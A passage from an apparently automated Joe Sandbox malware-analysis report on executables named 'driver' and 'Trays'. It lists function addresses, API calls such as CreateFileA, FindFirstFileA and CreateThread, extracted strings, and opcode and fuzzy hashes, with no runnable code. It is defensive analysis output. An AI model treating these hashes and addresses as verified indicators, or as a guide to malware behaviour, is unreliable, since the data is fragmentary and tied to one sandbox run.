                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$AttributesMove$Create
                                                                                                                                                                    • String ID: rtmp%d
                                                                                                                                                                    • API String ID: 1144019292-3303766350
                                                                                                                                                                    • Opcode ID: 85569995319dce5060edc5f1184e7ff41ed11f3963df9e10af7cb1ffa6f324a7
                                                                                                                                                                    • Instruction ID: f731214ef729a98cf50258c2d9082a8097f105d951df142f1ff17ff3f9ded5b2
                                                                                                                                                                    • Opcode Fuzzy Hash: 85569995319dce5060edc5f1184e7ff41ed11f3963df9e10af7cb1ffa6f324a7
                                                                                                                                                                    • Instruction Fuzzy Hash: DF419770A0451856DB10F6268C826EF63ADDF84348F4441BBA909F72D3EB7C9F868E5D
                                                                                                                                                                    Function 0043C780 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: Stack Overflow!$TAD
                                                                                                                                                                    • API String ID: 0-829875665
                                                                                                                                                                    • Opcode ID: 61cd0669aca0ca3012c091fdfdb21cbb0fe9b456f5e6941196284b0d1e2dc8a4
                                                                                                                                                                    • Instruction ID: 774899ebf6fdde59749c2ba383c9a4f0c5e482e88e25842834d42f22d6697c9a
                                                                                                                                                                    • Opcode Fuzzy Hash: 61cd0669aca0ca3012c091fdfdb21cbb0fe9b456f5e6941196284b0d1e2dc8a4
                                                                                                                                                                    • Instruction Fuzzy Hash: C52168706003059BEB24AF199CCAF6B3768EB49716F24646BF901A6341D378DE40CF6E
                                                                                                                                                                    Function 00440978 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24timeCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    • %02d/%02d/%04d %02d:%02d:%02d.%03d , xrefs: 004409AB
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: LocalTimewsprintf
                                                                                                                                                                    • String ID: %02d/%02d/%04d %02d:%02d:%02d.%03d
                                                                                                                                                                    • API String ID: 1577811021-3388318165
                                                                                                                                                                    • Opcode ID: 6ae8d3f423879c121ef3ca7a6f8db056c1573f6fda93804a97da499959c67a4e
                                                                                                                                                                    • Instruction ID: 82202b0b7452ad4c034c5aed5685f3df0c6aa7035818c04aa1022bb1e28d9b99
                                                                                                                                                                    • Opcode Fuzzy Hash: 6ae8d3f423879c121ef3ca7a6f8db056c1573f6fda93804a97da499959c67a4e
                                                                                                                                                                    • Instruction Fuzzy Hash: 50E0ED9244CA217592549F8A9C0193FB1E8AA9CF16F44490EB9D4801C1F66C8588D33A
                                                                                                                                                                    Function 0043AC30 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8libraryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadLibraryA.KERNEL32(borlndmm), ref: 0043AC35
                                                                                                                                                                    Strings
                                                                                                                                                                    • hrdir_b.c: LoadLibrary != mmdll borlndmm failed, xrefs: 0043AC42
                                                                                                                                                                    • borlndmm, xrefs: 0043AC30
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                                    • String ID: borlndmm$hrdir_b.c: LoadLibrary != mmdll borlndmm failed
                                                                                                                                                                    • API String ID: 1029625771-3092248643
                                                                                                                                                                    • Opcode ID: e609428960b1e67b3dd4e0920e4bc15147474a806fb4b3e83ddb781278b57c1f
                                                                                                                                                                    • Instruction ID: 9ef907cef298a5f48068758fbe660e1f2e201434e3560d444126cc25e800b247
                                                                                                                                                                    • Opcode Fuzzy Hash: e609428960b1e67b3dd4e0920e4bc15147474a806fb4b3e83ddb781278b57c1f
                                                                                                                                                                    • Instruction Fuzzy Hash: BCB09211280B80A22C16FBD16A53E1812529406B1AB3A655BE20278592CA6C6160642F
                                                                                                                                                                    Function 00423794 Relevance: 5.2, Strings: 4, Instructions: 202COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: 6+$U+${+$-
                                                                                                                                                                    • API String ID: 0-761993229
                                                                                                                                                                    • Opcode ID: 6ccefe3c331d89a266026245696727eb2731b3dc271b72b9b112b739b20133a4
                                                                                                                                                                    • Instruction ID: 77c8bb31205e7dde418d08497f083ca2a0db9e0b4aa1d109e8f2e105958d864c
                                                                                                                                                                    • Opcode Fuzzy Hash: 6ccefe3c331d89a266026245696727eb2731b3dc271b72b9b112b739b20133a4
                                                                                                                                                                    • Instruction Fuzzy Hash: C191B470A001689BDB14EB55D846BDDB3B5AF44314F9480FBE80867282CB7C9BC9CF59
                                                                                                                                                                    Function 00402248 Relevance: 5.2, Strings: 4, Instructions: 169COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: .rar$1$exe$sfx
                                                                                                                                                                    • API String ID: 0-1629913614
                                                                                                                                                                    • Opcode ID: cdd4b0b221cfccd45ebc4903eda97a3f603e1b902fe13b6ce9385f921d6098f8
                                                                                                                                                                    • Instruction ID: d904b7ce0f0c143f510481f6db376524699b32d3ec7583a25f69ba2163b91b0d
                                                                                                                                                                    • Opcode Fuzzy Hash: cdd4b0b221cfccd45ebc4903eda97a3f603e1b902fe13b6ce9385f921d6098f8
                                                                                                                                                                    • Instruction Fuzzy Hash: 9151682060829117CF19A6798EC976E67D45F1A308F1840FFE980EB3C6EBBCC941D25D
                                                                                                                                                                    Function 0043E490 Relevance: 5.1, APIs: 4, Instructions: 120COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 4c4c51ce3396af3583672ad144851fa655ebbdfaf580551f12a2cba1dd21f00b
                                                                                                                                                                    • Instruction ID: e564be4936fc43f24d6607c180f2e8c20570b753eeefdc078b0797d6f9d7bd1a
                                                                                                                                                                    • Opcode Fuzzy Hash: 4c4c51ce3396af3583672ad144851fa655ebbdfaf580551f12a2cba1dd21f00b
                                                                                                                                                                    • Instruction Fuzzy Hash: 2931B63070A206FBDB118EAACD40B7736A4DB5D728F34662BF515873D1E6B8EC028759
                                                                                                                                                                    Function 00426904 Relevance: 5.1, Strings: 4, Instructions: 91COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: %s$ $ / %s$PD
                                                                                                                                                                    • API String ID: 0-1899437327
                                                                                                                                                                    • Opcode ID: b06d16e2630d02eb3155889febcb3b8f22691344f76d3e0675e5c106cf02d1ab
                                                                                                                                                                    • Instruction ID: b8dd3f58c3d4ee07893ec4eaa9adbb6506a316676a7e205f1c04ff76f97562e9
                                                                                                                                                                    • Opcode Fuzzy Hash: b06d16e2630d02eb3155889febcb3b8f22691344f76d3e0675e5c106cf02d1ab
                                                                                                                                                                    • Instruction Fuzzy Hash: EC218EF1F042646EFF215579BC8576B3A889B16304FA5806BD891C2343EE7D8CC583AB

                                                                                                                                                                    Execution Graph

                                                                                                                                                                    Execution Coverage:6.4%
                                                                                                                                                                    Dynamic/Decrypted Code Coverage:50.6%
                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                    Total number of Nodes:81
                                                                                                                                                                    Total number of Limit Nodes:5
                                                                                                                                                                    execution_graph 8598 405000 8599 405012 CreateThread 8598->8599 8600 407b80 CreateMutexA 8615 4aa9f0c 8617 4aa9f1f 8615->8617 8616 4aa9fc4 8617->8616 8618 4aa9f96 8617->8618 8619 4aa9fd4 8617->8619 8621 4aa9f9b 8618->8621 8622 4aaa006 8618->8622 8620 4aa9d40 GetProcAddress 8619->8620 8620->8616 8621->8616 8632 4aa9d40 8621->8632 8625 4aa9dc8 8622->8625 8637 4aa9c74 8625->8637 8628 4aa9e18 8628->8616 8629 4aa9def PostMessageA 8629->8628 8630 4aa9e0e 8629->8630 8642 4aa9e3c 8630->8642 8633 4aa9c74 GetProcAddress 8632->8633 8635 4aa9d63 8633->8635 8634 4aa9d90 8634->8616 8635->8634 8636 4aa9e3c GetProcAddress 8635->8636 8636->8634 8638 4aa9d01 8637->8638 8639 4aa9c90 8637->8639 8638->8628 8638->8629 8639->8638 8640 4aa9ce7 8639->8640 8641 4aa9cef GetProcAddress 8640->8641 8641->8638 8643 4aa9c74 GetProcAddress 8642->8643 8644 4aa9e52 8643->8644 8644->8628 8601 40de48 FindNextFileA 8602 40de68 8601->8602 8603 40dac8 SetFilePointer 8645 405ce8 8646 40577c 8645->8646 8648 4057ac 8645->8648 8647 4058a8 SysAllocStringLen 8646->8647 8646->8648 8647->8646 8649 4058b8 8647->8649 8604 40da90 WriteFile 8605 40daba 8604->8605 8650 40db30 CloseHandle 8651 40deb0 8652 40dec1 DeleteFileA 8651->8652 8606 40d994 8607 40d9b2 8606->8607 8608 40d9fc 8606->8608 8607->8608 8609 40d9f3 CreateFileA 8607->8609 8609->8608 8654 40dbb4 8657 40db44 8654->8657 8658 40db5f FindFirstFileA 8657->8658 8659 40db6e 8658->8659 8610 40da58 ReadFile 8611 40da82 8610->8611 8660 4039f8 8663 403918 8660->8663 8664 40392f 8663->8664 8665 4039a3 CreateFileA 8664->8665 8666 4039b8 8664->8666 8665->8666 8667 40da38 8670 40da04 8667->8670 8669 40da4c 8671 40da27 CreateFileA 8670->8671 8671->8669 8672 492030 PostMessageA 8612 40dddc 8613 40de08 FindFirstFileA 8612->8613 8614 40de1d 8613->8614 8673 40503e RtlExitUserThread 8674 4aab054 8675 4aab18e 8674->8675 8676 4aab07f 8674->8676 8676->8675 8688 4aa8ff0 8676->8688 8679 4aa8ff0 ChangeWindowMessageFilter 8680 4aab0f1 8679->8680 8681 4aa8ff0 ChangeWindowMessageFilter 8680->8681 8682 4aab100 8681->8682 8683 4aa8ff0 ChangeWindowMessageFilter 8682->8683 8684 4aab10f 8683->8684 8685 4aa8ff0 ChangeWindowMessageFilter 8684->8685 8686 4aab118 8685->8686 8686->8675 8687 4aab18c PostMessageA 8686->8687 8687->8675 8689 4aa9008 8688->8689 8690 4aa900c ChangeWindowMessageFilter 8689->8690 8691 4aa9017 8689->8691 8690->8691 8691->8679

                                                                                                                                                                    Executed Functions

                                                                                                                                                                    Function 0040DB44 Relevance: 1.5, APIs: 1, Instructions: 37fileCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 87 40db44-40db6c FindFirstFileA 89 40dba5 87->89 90 40db6e-40db7e 87->90 91 40dbac-40dbb2 89->91 90->89 93 40db80-40dba3 90->93 93->89 93->91
                                                                                                                                                                    APIs
                                                                                                                                                                    • FindFirstFileA.KERNEL32(00000000), ref: 0040DB60
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000029.00000002.21460540022.000000000040D000.00000040.00000001.01000000.00000008.sdmp, Offset: 0040D000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_41_2_40d000_Trays.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileFindFirst
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1974802433-0
                                                                                                                                                                    • Opcode ID: ff141cc2e3688794e8a2fb639225409969a597f49bea793a2b77fab7c4718659
                                                                                                                                                                    • Instruction ID: 748bfc4d5e02c110cc23d6c5cdd32b3fdce779459f249be63df0214d6fbc6368
                                                                                                                                                                    • Opcode Fuzzy Hash: ff141cc2e3688794e8a2fb639225409969a597f49bea793a2b77fab7c4718659
                                                                                                                                                                    • Instruction Fuzzy Hash: A301FF71C0420CAACF11EBE5CD459DFB7BCAB44314F1046A6A514F72C1E638AB448B95
                                                                                                                                                                    Function 0040DDDC Relevance: 1.5, APIs: 1, Instructions: 37fileCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 96 40dddc-40de1b FindFirstFileA 98 40de38-40de3d 96->98 99 40de1d-40de2c call 40dd44 96->99 103 40de40-40de46 98->103 99->103 104 40de2e-40de36 call 40de84 99->104 104->103
                                                                                                                                                                    APIs
                                                                                                                                                                    • FindFirstFileA.KERNEL32(00000000), ref: 0040DE09
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000029.00000002.21460540022.000000000040D000.00000040.00000001.01000000.00000008.sdmp, Offset: 0040D000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_41_2_40d000_Trays.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileFindFirst
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1974802433-0
                                                                                                                                                                    • Opcode ID: e6e102debf8a5380534e75c1574eb971282807a3ec6408ffcb3bdbbc3a907a21
                                                                                                                                                                    • Instruction ID: 6122719a5bd6423ab2a47ccc8141c45b1b754f0e143b69604eeb7a7162d8a02e
                                                                                                                                                                    • Opcode Fuzzy Hash: e6e102debf8a5380534e75c1574eb971282807a3ec6408ffcb3bdbbc3a907a21
                                                                                                                                                                    • Instruction Fuzzy Hash: 9D010870D006099BCB00DF99C84559EB7B0FF04314F1046BAA428BB391D7389A40CB85
                                                                                                                                                                    Function 04AA9DC8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31windowCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 04AA9C74: GetProcAddress.KERNEL32(04AAC330,00000000), ref: 04AA9CF6
                                                                                                                                                                    • PostMessageA.USER32(?,?,?,?), ref: 04AA9DFF
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000029.00000002.21467718877.0000000004AA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 04AA1000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_41_2_4aa1000_Trays.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressMessagePostProc
                                                                                                                                                                    • String ID: PostMessageA
                                                                                                                                                                    • API String ID: 1993549440-3140657398
                                                                                                                                                                    • Opcode ID: 3af736d47aab316a1e1e0103fd30d524296a94cb69f076d526f7229c3ae33a92
                                                                                                                                                                    • Instruction ID: 517e43be28f160760b59bcb792ed9c65c329bb75dc77b5a6651933cc7ce523d2
                                                                                                                                                                    • Opcode Fuzzy Hash: 3af736d47aab316a1e1e0103fd30d524296a94cb69f076d526f7229c3ae33a92
                                                                                                                                                                    • Instruction Fuzzy Hash: DCF0BDB5D002189FDB50DFE8D8446DFF7FCAB08214F104A55A914E7341D734AA209B94
                                                                                                                                                                    Function 00403918 Relevance: 1.6, APIs: 1, Instructions: 69fileCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 65 403918-40392d 66 403944-40395f 65->66 67 40392f-403932 65->67 68 4039c1-4039cb 66->68 69 403961-403980 66->69 70 403938-40393d 67->70 71 4039da-4039df 67->71 74 4039d1 68->74 75 4039cd-4039cf 68->75 72 403982-403988 69->72 73 4039a3-4039b3 CreateFileA 69->73 70->66 85 40393f 70->85 76 4039ec 71->76 72->73 77 40398a-403996 72->77 78 4039b8-4039bb 73->78 79 4039d3-4039d8 74->79 75->79 81 4039f1-4039f4 76->81 77->73 82 403998-40399d 77->82 83 4039e1 78->83 84 4039bd-4039bf 78->84 79->78 82->73 83->76 84->81 85->66
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileA.KERNEL32(00000000,C0000000,?,00000000,00000002,00000080,00000000), ref: 004039B3
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000029.00000002.21459930645.0000000000403000.00000020.00000001.01000000.00000008.sdmp, Offset: 00403000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_41_2_403000_Trays.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                    • Opcode ID: 64dd86a98dfd67f2ba8bf55eecb8f7f88e9176f897a121a7ba6fbb3d7ad30ac8
                                                                                                                                                                    • Instruction ID: f430c53b2ef6d4a55ca7ec7e49562396a581d4a3403624793337386006ca327c
                                                                                                                                                                    • Opcode Fuzzy Hash: 64dd86a98dfd67f2ba8bf55eecb8f7f88e9176f897a121a7ba6fbb3d7ad30ac8
                                                                                                                                                                    • Instruction Fuzzy Hash: 0911F6A120420059E7149F1988897166D5D9F81716F2883BBA449AF3E6D6BC8A44939E
                                                                                                                                                                    Function 0040D994 Relevance: 1.5, APIs: 1, Instructions: 36fileCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 107 40d994-40d9b0 108 40d9b2-40d9bd 107->108 109 40d9fc-40da02 107->109 108->109 110 40d9bf-40d9f9 CreateFileA 108->110 110->109
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileA.KERNEL32(00000000), ref: 0040D9F4
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000029.00000002.21460540022.000000000040D000.00000040.00000001.01000000.00000008.sdmp, Offset: 0040D000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_41_2_40d000_Trays.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                    • Opcode ID: 755b513b66d02a7ac470c428b0d202dcb4a5521f8d76b14b9871dbcbb10f4231
                                                                                                                                                                    • Instruction ID: de3294ae11834e0e75170b091572cb0d027394e24dc50a1a43e099bd595cd06f
                                                                                                                                                                    • Opcode Fuzzy Hash: 755b513b66d02a7ac470c428b0d202dcb4a5521f8d76b14b9871dbcbb10f4231
                                                                                                                                                                    • Instruction Fuzzy Hash: 7AF03CB1E0064CABDB20DB9CDC82B4EB7B4EB05714F1042A1F424FB3C0C278AA509B49
                                                                                                                                                                    Function 00405000 Relevance: 1.5, APIs: 1, Instructions: 26threadCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 112 405000-40503b CreateThread
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateThread.KERNEL32(?,?,00404FC4,00000000,?,?), ref: 00405032
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000029.00000002.21459930645.0000000000405000.00000020.00000001.01000000.00000008.sdmp, Offset: 00405000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_41_2_405000_Trays.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateThread
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2422867632-0
                                                                                                                                                                    • Opcode ID: db7a0ebc8dac348e930320d343d01a4832e9002728855136780ce1379cd710cb
                                                                                                                                                                    • Instruction ID: 9868facc12a4fe35ba30a0e3a6ef9300ee2a5d50f4f58ae74fab94955e09e38e
                                                                                                                                                                    • Opcode Fuzzy Hash: db7a0ebc8dac348e930320d343d01a4832e9002728855136780ce1379cd710cb
                                                                                                                                                                    • Instruction Fuzzy Hash: 96E0E5B6200114ABD340DA5E9C44E9BABECEFD9328B11C16AB90CE72A2C574880587B4
                                                                                                                                                                    Function 0040DE48 Relevance: 1.5, APIs: 1, Instructions: 24fileCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 119 40de48-40de66 FindNextFileA 120 40de75-40de7a 119->120 121 40de68-40de73 call 40dd44 119->121 125 40de7d-40de83 120->125 121->125
                                                                                                                                                                    APIs
                                                                                                                                                                    • FindNextFileA.KERNEL32(?,?), ref: 0040DE5F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000029.00000002.21460540022.000000000040D000.00000040.00000001.01000000.00000008.sdmp, Offset: 0040D000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_41_2_40d000_Trays.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileFindNext
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2029273394-0
                                                                                                                                                                    • Opcode ID: 67a990705689ec06b45837d582591c9401892ae420851c88646fc597345079f1
                                                                                                                                                                    • Instruction ID: 5181e9f1019eef8e8e5b9ca6f42fabffc622a4311abcfd009dd117793cbd883b
